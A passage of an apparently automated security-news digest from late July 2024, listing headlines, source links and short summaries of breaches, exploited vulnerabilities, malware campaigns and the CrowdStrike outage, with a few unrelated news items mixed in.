          Debt collection agency Financial Business and Consumer Solutions (FBCS) has again increased the number of people impacted by a February data breach, now saying it affects 4.2 million people in the US. [...]



          A bug in Chrome Password Manager caused user credentials to disappear

          exploits
          2024-07-26 https://securityaffairs.com/166200/security/chrome-password-manager-bug.html
          Google addressed a Chrome Password Manager bug that caused user credentials to disappear temporarily for more than 18 hours. An 18-hour outage impacted Google Chrome's Password Manager on Wednesday, affecting users who rely on the tool to store and […]

          Autosummary: Google addressed a Chrome Password Manager bug that caused user credentials to disappear temporarily for more than 18 hours.


          Telegram for Android hit by a zero-day exploit – Week in security with Tony Anscombe

          exploits
          2024-07-26 https://www.welivesecurity.com/en/videos/telegram-android-hit-zero-day-exploit-week-security-tony-anscombe/
          Attackers abusing the "EvilVideo" vulnerability could share malicious Android payloads via Telegram channels, groups, and chats, all while making them appear as legitimate multimedia files



          Researchers expose GitHub Actions workflows as risky and exploitable

          exploits
          2024-07-25 https://www.helpnetsecurity.com/2024/07/25/risky-github-actions-workflows-video/

          GitHub is an immensely popular platform, with over 100 million developers and over 90% of Fortune 100 companies utilizing it. Despite its widespread use, many GitHub Actions workflows remain insecure, often due to excessive privileges or high-risk dependencies. In this Help Net Security video, Roy Blit, Head of Research at Legit Security, discusses a new Legit Security State of GitHub Actions Security report. The report unveils an especially concerning security posture and reveals that most …



          Michigan Medicine data breach impacted 56953 patients

          financial
          2024-07-25 https://securityaffairs.com/166138/cyber-crime/michigan-medicine-data-breach.html
          A cyber attack against Michigan Medicine resulted in the compromise of the personal and health information of approximately 57,000 patients. The academic medical center of the University of Michigan, Michigan Medicine, suffered a data breach that impacted 56,953 patients. The security incident exposed the personal and health information of the patients. Michigan Medicine notified patients […]

          Autosummary: The compromised data includes names, medical record numbers, addresses, dates of birth, diagnostic and treatment information, and health insurance details.


          CISA Warns of Exploitable Vulnerabilities in Popular BIND 9 DNS Software

          exploits
          2024-07-25 https://thehackernews.com/2024/07/cisa-warns-of-exploitable.html
          The Internet Systems Consortium (ISC) has released patches to address multiple security vulnerabilities in the Berkeley Internet Name Domain (BIND) 9 Domain Name System (DNS) software suite that could be exploited to trigger a denial-of-service (DoS) condition. "A cyber threat actor could exploit one of these vulnerabilities to cause a denial-of-service condition," the U.S. Cybersecurity and



          Meta Removes 63,000 Instagram Accounts Linked to Nigerian Sextortion Scams

          financial
          2024-07-25 https://thehackernews.com/2024/07/meta-removes-63000-instagram-accounts.html
          Meta Platforms on Wednesday said it took steps to remove around 63,000 Instagram accounts in Nigeria that were found to target people with financial sextortion scams. "These included a smaller coordinated network of around 2,500 accounts that we were able to link to a group of around 20 individuals," the company said. "They targeted primarily adult men in the U.S. and used fake accounts to mask

          Autosummary: Meta attributed the second cluster to a cybercrime group tracked as Yahoo Boys, which came under the radar earlier this year for orchestrating financial sextortion attacks targeting teenagers from Australia, Canada, and the U.S. A subsequent report from Bloomberg exposed sextortion-fueled suicides, revealing how scammers are posing as teenage girls on Instagram and Snapchat to lure targets and entice them into sending explicit photos, which are then used to blackmail victims in exchange for money or risk getting their images forwarded to their friends.


          Researchers Reveal ConfusedFunction Vulnerability in Google Cloud Platform

          exploits
          2024-07-25 https://thehackernews.com/2024/07/experts-expose-confusedfunction.html
          Cybersecurity researchers have disclosed a privilege escalation vulnerability impacting Google Cloud Platform's Cloud Functions service that an attacker could exploit to access other services and sensitive data in an unauthorized manner. Tenable has given the vulnerability the name ConfusedFunction. "An attacker could escalate their privileges to the Default Cloud Build Service Account and

          Autosummary: "An attacker could escalate their privileges to the Default Cloud Build Service Account and access numerous services such as Cloud Build, storage (including the source code of other functions), artifact registry and container registry," the exposure management company said in a statement.


          Hackers exploit Microsoft Defender SmartScreen bug CVE-2024-21412 to deliver ACR, Lumma, and Meduza Stealers

          exploits
          2024-07-25 https://securityaffairs.com/166152/security/cve-2024-21412-flaw-info-stealers.html
          The CVE-2024-21412 flaw in Microsoft Defender SmartScreen has been exploited to deliver information stealers such as ACR Stealer, Lumma, and Meduza. Fortinet FortiGuard Labs researchers observed a malware campaign exploiting the vulnerability CVE-2024-21412 (CVSS score: 8.1) to spread information stealers such as ACR Stealer, Lumma, and Meduza. CVE-2024-21412 is an Internet Shortcut Files Security Feature Bypass Vulnerability. The flaw […]

          Autosummary: This code retrieves the necessary APIs, creates a folder, and drops files in the “%TEMP%” directory, including a HijackLoader, indicated by specific byte patterns in the data.


          Progress warns of critical RCE bug in Telerik Report Server

          exploits
          2024-07-25 https://www.bleepingcomputer.com/news/security/progress-warns-of-critical-rce-bug-in-telerik-report-server/
          Progress Software has warned customers to patch a critical remote code execution security flaw in the Telerik Report Server that can be used to compromise vulnerable devices. [...]

          Autosummary: More recently, security researchers developed and released a proof-of-concept (PoC) exploit targeting remote code execution on Telerik Report servers by chaining a critical authentication bypass flaw (CVE-2024-4358) and a high-severity RCE (CVE-2024-1800).


          French police push PlugX malware self-destruct payload to clean PCs

          exploits
          2024-07-25 https://www.bleepingcomputer.com/news/security/french-police-push-plugx-malware-self-destruct-payload-to-clean-pcs/
          The French police and Europol are pushing out a "disinfection solution" that automatically removes the PlugX malware from infected devices in France. [...]

          Autosummary: "Given the potential legal challenges that could arise from conducting a widespread disinfection campaign, which involves sending an arbitrary command to workstations we do not own, we have resolved to defer the decision on whether to disinfect workstations in their respective countries to the discretion of national Computer Emergency Response Teams (CERTs), Law Enforcement Agencies (LEAs), and cybersecurity authorities," explained Sekoia in their April report.


          Why Multivendor Cybersecurity Stacks Are Increasingly Obsolete

          ciber
          2024-07-25 https://www.bleepingcomputer.com/news/security/why-multivendor-cybersecurity-stacks-are-increasingly-obsolete/
          Multivendor tech stacks are costly and complex to integrate and manage. Learn more from Cynet about how an All-in-One approach reduces costs for MSPs and SMEs, while offering increased security. [...]

          Autosummary: By consolidating tools, automating tasks, and enhancing efficiency, the All-in-One approach to cybersecurity empowers MSPs to maximize their margins. Cynet's All-in-One Cybersecurity Platform, on the other hand, is a purpose-built, unified full suite of security capabilities on a single, simple platform.


          SEXi / APT Inc ransomware – what you need to know

          exploits ransomware
          2024-07-25 https://www.tripwire.com/state-of-security/sexi-apt-inc-ransomware-what-you-need-know
          A cybercrime group has gained notoriety for attacking VMware ESXi servers since February 2024. Learn more about the SEXi / APT Inc ransomware in my article on the Tripwire State of Security blog.

          Autosummary: ESXi is a popular choice with cloud providers and data centres that need to host thousands of virtual machines for their customers, but there are also use cases in healthcare, finance, education, and other sectors. Files related to virtual machines, such as virtual disks, storage, and backup images, are targeted.


          North Korean Hackers Shift from Cyber Espionage to Ransomware Attacks

          exploits ransomware
          2024-07-25 https://thehackernews.com/2024/07/north-korean-hackers-shift-from-cyber.html
          A North Korea-linked threat actor known for its cyber espionage operations has gradually expanded into financially-motivated attacks that involve the deployment of ransomware, setting it apart from other nation-state hacking groups linked to the country. Google-owned Mandiant is tracking the activity cluster under a new moniker APT45, which overlaps with names such as Andariel, Nickel Hyatt,

          Autosummary: "APT45 is a long-running, moderately sophisticated North Korean cyber operator that has carried out espionage campaigns as early as 2009," researchers Taylor Long, Jeff Johnson, Alice Revelli, Fred Plan, and Michael Barnhart said.


          Ten-year-old boy killed in Colombia's first drone death

          latam
          2024-07-25 https://www.bbc.com/news/articles/c87r84xm6v2o
          The country's defence ministry has blamed Wednesday's attack on rebel guerrillas.



          US offers $10M for tips on DPRK hacker linked to Maui ransomware attacks

          exploits ransomware
          2024-07-25 https://www.bleepingcomputer.com/news/security/us-offers-10m-for-tips-on-dprk-hacker-linked-to-maui-ransomware-attacks/
          The U.S. State Department is offering a reward of up to $10 million for information that could lead to the identification or location of a North Korean military hacker. [...]

          Autosummary: "The information targeted—such as contract specifications, bills of materials, project details, design drawings, and engineering documents—has military and civilian applications and leads the authoring agencies to assess one of the group's chief responsibilities as satisfying collection requirements for Pyongyang's nuclear and defense programs," the authoring agencies added.


          Critical bug in Docker Engine allowed attackers to bypass authorization plugins

          exploits
          2024-07-25 https://securityaffairs.com/166160/hacking/docker-engine-critical-flaw.html
          A critical vulnerability in some versions of Docker Engine, tracked as CVE-2024-41110 (CVSS score of 10.0), can be exploited to bypass authorization plugins (AuthZ) under specific circumstances. “An attacker could exploit a bypass using an API request with […]

          Autosummary: Below is the list of versions of Docker Engine that are impacted if the AuthZ plugin is used: <= v19.03.15, <= v20.10.27, <= v23.0.14, <= v24.0.9, <= v25.0.5, <= v26.0.2, <= v26.1.4, <= v27.0.3, and <= v27.1.0. Docker Engine v19.03.x and later versions are not affected if authorization plugins are not used for access control decisions.


          PKfail Secure Boot bypass lets attackers install UEFI malware

          exploits
          2024-07-25 https://www.bleepingcomputer.com/news/security/pkfail-secure-boot-bypass-lets-attackers-install-uefi-malware/
          Hundreds of UEFI products from 10 vendors are susceptible to compromise due to a critical firmware supply-chain issue known as PKfail, which allows attackers to bypass Secure Boot and install malware. [...]

          Autosummary: The UEFI device makers who used untrusted test keys across 813 products include Acer, Aopen, Dell, Formelife, Fujitsu, Gigabyte, HP, Intel, Lenovo, and Supermicro.


          Critical ServiceNow RCE flaws actively exploited to steal credentials

          exploits
          2024-07-25 https://www.bleepingcomputer.com/news/security/critical-servicenow-rce-flaws-actively-exploited-to-steal-credentials/
          Threat actors are chaining together ServiceNow flaws using publicly available exploits to breach government agencies and private firms in data theft attacks. [...]

          Autosummary: This malicious activity was reported by Resecurity, which, after monitoring it for a week, identified multiple victims, including government agencies, data centers, energy providers, and software development firms.


          Cybersecurity jobs available right now: July 24, 2024

          ciber
          2024-07-24 https://www.helpnetsecurity.com/2024/07/24/cybersecurity-jobs-available-right-now-july-24-2024/

          Applied Cryptographer, Quantstamp | EMEA | Remote. As an Applied Cryptographer, you will research various cryptographic protocols and have knowledge of cryptographic primitives or concepts, like elliptic curve cryptography, hash functions, and PCPs. You should have experience with at least one major language, like Rust, Python, Java, or C; the exact language is not too important. You should be familiar with versioning software (specifically, GitHub), testing, and a familiarity with …


          Autosummary: Director of Information Security, Cyber Risk and Compliance, S&P Global | Italy | On-site. As a Director of Information Security, Cyber Risk and Compliance, you will become familiar with the Cyber Risk and Compliance team activities and Market Intelligence regarding SOC reporting, relevant regulatory requirements, control frameworks, internal and external audit processes, customer interactions including security questions and audits, and overall company and divisional cyber security processes and controls. Digital Forensics and Incident Response Analyst, Accenture | Philippines | On-site. As a Digital Forensics and Incident Response Analyst, you will perform incident response to cybersecurity incidents, including but not limited to APT & Nation State attacks, Ransomware infections and Malware outbreaks, Insider Threats, BEC, DDOS, Security and Data breach, etc. Senior CyberSecurity Architect, Hexagon Geosystems | European Economic Area | Remote. As a Senior CyberSecurity Architect, you will plan, organize, test, and document the implementation of new security systems and tools; define the success criteria and security requirements, and develop reference architecture, functional and non-functional requirements for proof-of-concept efforts and projects. (Senior) Information Security Officer, Oetker Digital | Germany | Hybrid. As a (Senior) Information Security Officer, you will develop, implement, and monitor a strategic, comprehensive company information security and IT risk management program, based on the Oetker Group-wide security directive.


          Cybersecurity ROI: Top metrics and KPIs

          industry ciber
          2024-07-24 https://www.helpnetsecurity.com/2024/07/24/karthik-swarnam-armorcode-cybersecurity-roi/

          In this Help Net Security interview, Karthik Swarnam, Chief Security and Trust Officer at ArmorCode, discusses key metrics and KPIs to measure cybersecurity ROI. Swarnam shares strategies for enhancing ROI through proactive measures and effective communication with executive leadership. What are the primary metrics and KPIs used to measure the ROI of cybersecurity investments? Today, cybersecurity investments are evaluated not just for cost avoidance but for a much broader range of benefits. These metrics include: …


          Autosummary: To improve cybersecurity ROI, security professionals should establish clear metrics: define and measure key metrics across various domains such as identity & access management, risk remediation, software development, data loss prevention, and messaging security. Tool rationalization: by leveraging a governance layer, organizations can eliminate redundant security tools, optimizing their security investments. Traditional metrics for this measurement include the number of detected incidents, Mean Time to Detect (MTTD), Mean Time to Respond (MTTR), and patch management (average time to deploy fixes).


          Microsoft Defender Flaw Exploited to Deliver ACR, Lumma, and Meduza Stealers

          exploits
          2024-07-24 https://thehackernews.com/2024/07/microsoft-defender-flaw-exploited-to.html
          A now-patched security flaw in the Microsoft Defender SmartScreen has been exploited as part of a new campaign designed to deliver information stealers such as ACR Stealer, Lumma, and Meduza. Fortinet FortiGuard Labs said it detected the stealer campaign targeting Spain, Thailand, and the U.S. using booby-trapped files that exploit CVE-2024-21412 (CVSS score: 8.1). The high-severity

          Autosummary: "This ACR stealer hides its [command-and-control] with a dead drop resolver (DDR) technique on the Steam community website," Lin said, calling out its ability to siphon information from web browsers, crypto wallets, messaging apps, FTP clients, email clients, VPN services, and password managers.


          CISA Adds Twilio Authy and IE Flaws to Exploited Vulnerabilities List

          exploits
          2024-07-24 https://thehackernews.com/2024/07/cisa-adds-twilio-authy-and-ie-flaws-to.html
          The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two security flaws to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The vulnerabilities are listed below: CVE-2012-4792 (CVSS score: 9.3), Microsoft Internet Explorer Use-After-Free Vulnerability; CVE-2024-39891 (CVSS score: 5.3), Twilio Authy Information Disclosure



          CrowdStrike to improve testing after "bug" caused outage

          exploits
          2024-07-24 https://www.bbc.com/news/articles/ce58p0048r0o
          The cybersecurity company's mistake caused millions of PCs not to work on Friday.



          CrowdStrike: "Content Validator" bug let faulty update pass checks

          exploits
          2024-07-24 https://www.bleepingcomputer.com/news/security/crowdstrike-content-validator-bug-let-faulty-update-pass-checks/
          CrowdStrike released a Preliminary Post Incident Review (PIR) on the faulty Falcon update explaining that a bug allowed bad data to pass its Content Validator and cause millions of Windows systems to crash on July 19, 2024. [...]

          Autosummary: Local developer testing; content update and rollback testing; stress testing, fuzzing, and fault injection; stability testing; content interface testing. Moreover, additional validation checks will be added to the Content Validator, and error handling in the Content Interpreter will be improved to avoid such mistakes leading to inoperable Windows machines.


          Hot topics: Can’t-miss sessions at Mandiant’s 2024 mWISE event

          industry
          2024-07-24 https://www.bleepingcomputer.com/news/security/hot-topics-cant-miss-sessions-at-mandiants-2024-mwise-event/
          Now that the mWISE 2024 session catalog is out, it's time to take a closer look at the topics. Learn more from @mWISEConference about the three hottest tracks in this year's conference. [...]

          Autosummary: The Dark Side of Innovation: Generative AI in Cybercrime. A look at how GenAI tools are being used in cybercrime, including phishing attacks crafted with AI-generated content, the use of deepfakes for identity fraud, and AI-driven network intrusion techniques.


          Network of ghost GitHub accounts successfully distributes malware

          exploits
          2024-07-24 https://www.helpnetsecurity.com/2024/07/24/github-accounts-malware-distribution/

          Check Point researchers have unearthed an extensive network of GitHub accounts that they believe provides malware and phishing link Distribution-as-a-Service. Set up and operated by a threat group the researchers dubbed as Stargazer Goblin, the “Stargazers Ghost Network” is estimated to encompass over 3,000 active accounts, some created by the group and others hijacked. “The network distributed all sorts of malware families, including Atlantida Stealer, Rhadamanthys, RisePro, Lumma Stealer, and RedLine,” they found. The set-up …


          Autosummary: “Similar to GitHub, other platforms can be utilized to legitimize malicious phishing and distribute links and malware to victims through posts, repositories, videos, tweets, and channels, depending on the features each platform offers,” Terefos noted.


          CrowdStrike blames buggy testing software for disastrous update

          exploits
          2024-07-24 https://www.helpnetsecurity.com/2024/07/24/crowdstrike-update-testing/

          A bug in the Content Validator – a software element CrowdStrike relies on for testing and validating Rapid Response Content updates for its Falcon Sensors – is (partly) why the faulty update wasn’t caught in time, the company said. In a period of (approximately) an hour and 20 minutes on Friday, July 19, 2024, the defective update was delivered to around 8.5 million systems, and triggered a massive worldwide outage of Windows-based systems. CrowdStrike explains …


          Autosummary: The company has outlined what it intends to do to prevent incidents like these from happening again, and it includes: implementing a variety of testing types for Rapid Response Content; adding additional validation checks to the Content Validator for Rapid Response Content; improving how the Content Interpreter handles errors; and implementing a staggered deployment strategy for Rapid Response Content (which will include a canary deployment) and improving monitoring for glitches when the various rollout phases happen. But, equally importantly, it promises to give customers some control over when the Rapid Response Content updates are deployed and to provide release notes for them.


          Telegram App Flaw Exploited to Spread Malware Hidden in Videos

          exploits
          2024-07-24 https://thehackernews.com/2024/07/telegram-app-flaw-exploited-to-spread.html
          A zero-day security flaw in Telegram's mobile app for Android called EvilVideo made it possible for attackers to share malicious files disguised as harmless-looking videos. The exploit appeared for sale for an unknown price in an underground forum on June 6, 2024, ESET said. Following responsible disclosure on June 26, the issue was addressed by Telegram in version 10.14.5 released on July 11.

          Autosummary: Ratel, offered via a Telegram channel named "hamster_easy," is designed to impersonate the game ("Hamster.apk") and prompts users to grant it notification access and set itself as the default SMS application. "Attackers could share malicious Android payloads via Telegram channels, groups, and chat, and make them appear as multimedia files," security researcher Lukáš Štefanko said in a report.


          Microsoft fixes bug behind Windows 10 Connected Cache delivery issues

          exploits
          2024-07-24 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-bug-behind-windows-10-connected-cache-delivery-issues/
          Microsoft has fixed a known Windows 10 update issue that broke Microsoft Connected Cache (MCC) node discovery on enterprise networks. [...]

          Autosummary: "After installing the January 2024 non-security update (KB5034203), released January 23, 2024, or later updates, some Windows devices which use the DHCP Option 235 for discovery of Microsoft Connected Cache (MCC) nodes in their network might be unable to use the MCC nodes," Microsoft said when it first confirmed the issue in April.


          TracFone will pay $16 million to settle FCC data breach investigation

          financial
          2024-07-24 https://www.malwarebytes.com/blog/news/2024/07/tracfone-will-pay-16-million-to-settle-fcc-data-breach-investigation
          Prepay wireless provider TracFone has been slapped on the wrist to the tune of $16 million for insufficient customer data protection "

          Autosummary: In addition to the civil penalty, the FCC secured extra assignments for TracFone in the Consent Decree: TracFone has to deploy a mandated information security program, with novel provisions to reduce API vulnerabilities in ways consistent with widely accepted standards, like those identified by the National Institute of Standards and Technology (NIST) and the Open Worldwide Application Security Project (OWASP). Following three separate data breaches between 2021 and 2023 which exposed the proprietary information (PI) of TracFone Wireless customers, the Federal Communications Commission (FCC) announced that the Verizon-owned company has agreed to pay a $16 million civil penalty to settle the government investigation, and it has made an agreement to improve its application programming interface (API) security. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. "


          Over 3,000 GitHub accounts used by malware distribution service

          exploits
          2024-07-24 https://www.bleepingcomputer.com/news/security/over-3-000-github-accounts-used-by-malware-distribution-service/
          Threat actors known as "Stargazer Goblin" have created a malware Distribution-as-a-Service (DaaS) from over 3,000 fake accounts on GitHub that push information-stealing malware. [...] "

          Autosummary: As for what malware is distributed through the Stargazers Ghost Network's operation, Check Point says it includes RedLine, Lumma Stealer, Rhadamanthys, RisePro, and Atlantida Stealer, among others. Stargazer repositories added daily on GitHub (Source: Check Point). Users arriving on GitHub repositories through malvertising, Google Search results, YouTube videos, Telegram, or social media are advised to be very cautious with file downloads and the URLs they click. "


          Smashing Security podcast #382: CrowdStrike, Dark Wire, and the Paris Olympics

          industry
          2024-07-24 https://grahamcluley.com/smashing-security-podcast-382/
          Computers blue-screen-of-death around the world! The Paris Olympics is at risk of attack! And the FBI pull off the biggest sting operation in history by running a secret end-to-end encrypted messaging app! All this and much much more is discussed in the latest edition of the “Smashing Security” podcast by industry veterans Graham Cluley and … Continue reading "Smashing Security podcast #382: CrowdStrike, Dark Wire, and the Paris Olympics" "

          Autosummary: Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Guest: Joseph Cox – @josephfcox Episode links: Sponsored by: 1Password Extended Access Management – Secure every sign-in for every app on every device. "


          U.S. CISA adds Microsoft Internet Explorer and Twilio Authy bugs to its Known Exploited Vulnerabilities catalog

          exploits
          2024-07-24 https://securityaffairs.com/166126/breaking-news/u-s-cisa-adds-microsoft-internet-explorer-and-twilio-authy-bugs-known-exploited-vulnerabilities-catalog.html
          U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Microsoft Internet Explorer and Twilio Authy bugs to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: Below are the descriptions of the flaws added to the KEV catalog: CVE-2012-4792 (CVSS score of […] "

          Autosummary: "


          Morocco beat Argentina in game marred by crowd trouble

          latam
          2024-07-24 https://www.bbc.com/sport/articles/cv2gzll8wn5o
          Crowd trouble forces the first football match of the Olympics to be delayed by almost two hours, with Morocco finally beating Argentina 2-1 in an empty stadium. "

          Autosummary: "


          Vulnerability in Telegram app for Android allows sending malicious files disguised as videos

          exploits
          2024-07-23 https://www.helpnetsecurity.com/2024/07/23/telegram-exploit-evilvideo/

          ESET researchers discovered a zero-day exploit, which targets the Telegram app for Android, that appeared for sale for an unspecified price in an underground forum post from June 2024. Example of how the EvilVideo exploit appears on Telegram (source: ESET). Using the exploit to abuse a vulnerability that ESET named “EvilVideo,” attackers could share malicious Android payloads via Telegram channels, groups, and chats, and make them appear to be multimedia files. “We found the exploit … More

          The post Vulnerability in Telegram app for Android allows sending malicious files disguised as videos appeared first on Help Net Security.

          "

          Autosummary: Using the exploit to abuse a vulnerability that ESET named “EvilVideo,” attackers could share malicious Android payloads via Telegram channels, groups, and chats, and make them appear to be multimedia files. "


          Ukrainian Institutions Targeted Using HATVIBE and CHERRYSPY Malware

          exploits
          2024-07-23 https://thehackernews.com/2024/07/ukrainian-institutions-targeted-using.html
          The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of a spear-phishing campaign targeting a scientific research institution in the country with malware known as HATVIBE and CHERRYSPY. The agency attributed the attack to a threat actor it tracks under the name UAC-0063, which was previously observed targeting various government entities to gather sensitive information using "

          Autosummary: "


          Sharks off Brazil coast test positive for cocaine

          latam
          2024-07-23 https://www.bbc.com/news/articles/cek9mr43x1xo
          Sharks taken from the shores near Rio de Janeiro have tested positive for high levels of cocaine. "

          Autosummary: "


          Fake CrowdStrike repair manual pushes new infostealer malware

          exploits
          2024-07-23 https://www.bleepingcomputer.com/news/security/fake-crowdstrike-repair-manual-pushes-new-daolpu-infostealer-malware/
          CrowdStrike is warning that a fake recovery manual to repair Windows devices is installing a new information-stealing malware called Daolpu. [...] "

          Autosummary: Once active on the system, the stealer harvests account credentials, browser history, and authentication cookies stored in Chrome, Edge, Firefox, and the Cốc Cốc web browsers. "


          British teen arrested in connection with MGM Resorts ransomware attack

          exploits ransomware
          2024-07-23 https://www.bitdefender.com/blog/hotforsecurity/british-teen-arrested-in-connection-with-mgm-resorts-ransomware-attack/
          British police have arrested a 17-year-old boy believed to be linked to a cybercriminal gang that launched devastating ransomware attacks last year on MGM Resorts and other companies. Read more in my article on the Hot for Security blog. "

          Autosummary: "


          Strata Identity Continuity prevents mission-critical applications from going offline

          ransomware
          2024-07-23 https://www.helpnetsecurity.com/2024/07/23/strata-identity-continuity/

          Strata Identity announced Identity Continuity, an addition to its Maverics Identity Orchestration platform. This new premium offering ensures business continuity and uninterrupted application access by seamlessly failing over from a primary cloud Identity Provider (IDP) to a secondary IDP, using an on-premises IDP or cloud-to-cloud failover capabilities. “In many sectors, especially financial services, system outages to critical applications have become extremely damaging to the business. Uptime for business-critical applications is often tied to uptime of … More

          The post Strata Identity Continuity prevents mission-critical applications from going offline appeared first on Help Net Security.

          "

          Autosummary: These interruptions, whether due to SaaS misconfigurations, natural disasters, malicious attacks, or platform outages, can halt business operations, leading to revenue loss, productivity decline, and reputational damage. "


          Chinese Hackers Target Taiwan and US NGO with MgBot Malware

          exploits
          2024-07-23 https://thehackernews.com/2024/07/chinese-hackers-target-taiwan-and-us.html
          Organizations in Taiwan and a U.S. non-governmental organization (NGO) based in China have been targeted by a Beijing-affiliated state-sponsored hacking group called Daggerfly using an upgraded set of malware tools. The campaign is a sign that the group "also engages in internal espionage," Symantec's Threat Hunter Team, part of Broadcom, said in a new report published today. "In the attack on "

          Autosummary: "The group can create versions of its tools targeting most major operating system platform," Symantec said, adding it has "seen evidence of the ability to trojanize Android APKs, SMS interception tools, DNS request interception tools, and even malware families targeting Solaris OS. "


          New ICS Malware "FrostyGoop" Targeting Critical Infrastructure

          exploits industry
          2024-07-23 https://thehackernews.com/2024/07/new-ics-malware-frostygoop-targeting.html
          Cybersecurity researchers have discovered what they say is the ninth Industrial Control Systems (ICS)-focused malware that has been used in a disruptive cyber attack targeting an energy company in the Ukrainian city of Lviv earlier this January. Industrial cybersecurity firm Dragos has dubbed the malware FrostyGoop, describing it as the first malware strain to directly use Modbus TCP "

          Autosummary: It's also the ninth ICS-focused malware after Stuxnet, Havex, Industroyer (aka CrashOverride), Triton (aka Trisis), BlackEnergy2, Industroyer2, and COSMICENERGY. "


          FrostyGoop malware attack cut off heat in Ukraine during winter

          exploits
          2024-07-23 https://www.bleepingcomputer.com/news/security/frostygoop-malware-attack-cut-off-heat-in-ukraine-during-winter/
          Russian-linked malware was used in a January 2024 cyberattack to cut off the heating of over 600 apartment buildings in Lviv, Ukraine, for two days during sub-zero temperatures. [...] "

          Autosummary: The company advises industrial organizations to implement the SANS 5 Critical Controls for World-Class OT Cybersecurity, including "ICS incident response, defensible architecture, ICS network visibility and monitoring, secure remote access, and risk-based vulnerability management." "


          Verizon to pay $16 million in TracFone data breach settlement

          financial
          2024-07-23 https://www.bleepingcomputer.com/news/security/verizon-to-pay-16-million-in-tracfone-data-breach-settlement/
          Verizon Communications has agreed to a $16,000,000 settlement with the Federal Communications Commission (FCC) in the U.S. concerning three data breach incidents its wholly-owned subsidiary, TracFone Wireless, suffered after its acquisition in 2021. [...] "

          Autosummary: The other two data breach incidents concern TracFone's order websites, reported on December 20, 2022, and January 13, 2023, respectively. "


          Hamster Kombat’s 250 million players targeted in malware attacks

          exploits
          2024-07-23 https://www.bleepingcomputer.com/news/security/hamster-kombats-250-million-players-targeted-in-android-windows-malware-attacks/
          Threat actors are taking advantage of the massive popularity of the Hamster Kombat game, targeting players with fake Android and Windows software that installs spyware and information-stealing malware. [...] "

          Autosummary: The Hamster Kombat app interface (Source: BleepingComputer). Targeting the "hamsters": Although a clone app named "Hamster Kombat – Earn Crypto" exists on Google Play, the genuine project isn't available on any official channels but Telegram, making those interested in joining easy prey for cybercriminals and scammers. "


          FrostyGoop ICS malware targets Ukraine

          exploits industry
          2024-07-23 https://securityaffairs.com/166087/malware/frostygoop-ics-malware-modbus.html
          In April 2024, Dragos researchers spotted the malware FrostyGoop that interacts with Industrial Control Systems (ICS) using the Modbus protocol. In April 2024, Dragos researchers discovered a new ICS malware named FrostyGoop that interacts with Industrial Control Systems using the Modbus protocol. FrostyGoop is the ninth ICS malware that was discovered and that a nation-state […] "

          Autosummary: By Pierluigi Paganini, July 23, 2024. In April 2024, Dragos researchers spotted the malware FrostyGoop that interacts with Industrial Control Systems (ICS) using the Modbus protocol. "


          Ad-injecting malware posing as DwAdsafe ad blocker uses Microsoft-signed driver

          exploits
          2024-07-22 https://www.helpnetsecurity.com/2024/07/22/dwadsafe-ad-blocker-hotpage-malware/

          ESET Research has discovered a sophisticated Chinese browser injector: a signed, vulnerable, ad-injecting driver from a mysterious Chinese company. This threat, which ESET dubbed HotPage, comes self-contained in an executable file that installs its main driver and injects libraries into Chromium-based browsers. The Chinese company’s certified products listed in the Windows Server Catalog (source: ESET). Posing as a security product capable of blocking advertisements, it actually introduces new ads. Additionally, the malware can replace the … More

          The post Ad-injecting malware posing as DwAdsafe ad blocker uses Microsoft-signed driver appeared first on Help Net Security.

          "

          Autosummary: According to available information, the business scope of the company includes technology-related activities such as development, services, and consulting – but also advertising activities. Additionally, the malware can replace the content of the current page, redirect the user, or simply open a new tab to a website full of other ads. "


          Cross-industry standards for data provenance in AI

          industry
          2024-07-22 https://www.helpnetsecurity.com/2024/07/22/saira-jesani-data-trust-alliance-data-provenance-standards/

          In this Help Net Security interview, Saira Jesani, Executive Director of the Data & Trust Alliance, discusses the role of data provenance in AI trustworthiness and its impact on AI models’ performance and reliability. Jesani highlights the collaborative process behind developing cross-industry metadata standards to address widespread data provenance challenges and ensure applicability across various sectors. Can you explain why data provenance is critical for AI trustworthiness and how it impacts AI models’ overall performance … More

          The post Cross-industry standards for data provenance in AI appeared first on Help Net Security.

          "

          Autosummary: This diverse group of contributors with functions including chief technology officers, chief data officers, and leaders in data governance, data acquisition, data quality, privacy, legal, and compliance ensured that the standards address common challenges and needs across multiple industries. They included American Express, Humana, IBM, Mastercard, Nielsen, Pfizer, UPS, and Walmart. As AI systems become more integrated into various sectors, the adoption of these standards can help ensure that data used in AI applications is reliable and legally compliant, thereby mitigating risks related to privacy, copyright, and brand protection. "


          New Linux Variant of Play Ransomware Targeting VMware ESXi Systems

          exploits ransomware Linux
          2024-07-22 https://thehackernews.com/2024/07/new-linux-variant-of-play-ransomware.html
          Cybersecurity researchers have discovered a new Linux variant of a ransomware strain known as Play (aka Balloonfly and PlayCrypt) that's designed to target VMware ESXi environments. "This development suggests that the group could be broadening its attacks across the Linux platform, leading to an expanded victim pool and more successful ransom negotiations," Trend Micro researchers said in a "

          Autosummary: Manufacturing, professional services, construction, IT, retail, financial services, transportation, media, legal services, and real estate are some of the top industries affected by the Play ransomware during the time period. "


          SocGholish Malware Exploits BOINC Project for Covert Cyberattacks

          exploits ciber
          2024-07-22 https://thehackernews.com/2024/07/socgholish-malware-exploits-boinc.html
          The JavaScript downloader malware known as SocGholish (aka FakeUpdates) is being used to deliver a remote access trojan called AsyncRAT as well as a legitimate open-source project called BOINC. BOINC, short for Berkeley Open Infrastructure Network Computing Client, is an open-source "volunteer computing" platform maintained by the University of California with an aim to carry out "large-scale "

          Autosummary: These malicious installations are designed to connect to an actor-controlled domain ("rosettahome[.]cn" or "rosettahome[.]top"), essentially acting as a command-and-control (C2) server to collect host data, transmit payloads, and push further commands. "


          Telegram zero-day allowed sending malicious Android APKs as videos

          exploits
          2024-07-22 https://www.bleepingcomputer.com/news/security/telegram-zero-day-allowed-sending-malicious-android-apks-as-videos/
          A Telegram for Android zero-day vulnerability dubbed "EvilVideo" allowed attackers to send malicious Android APK payloads disguised as video files. [...] "
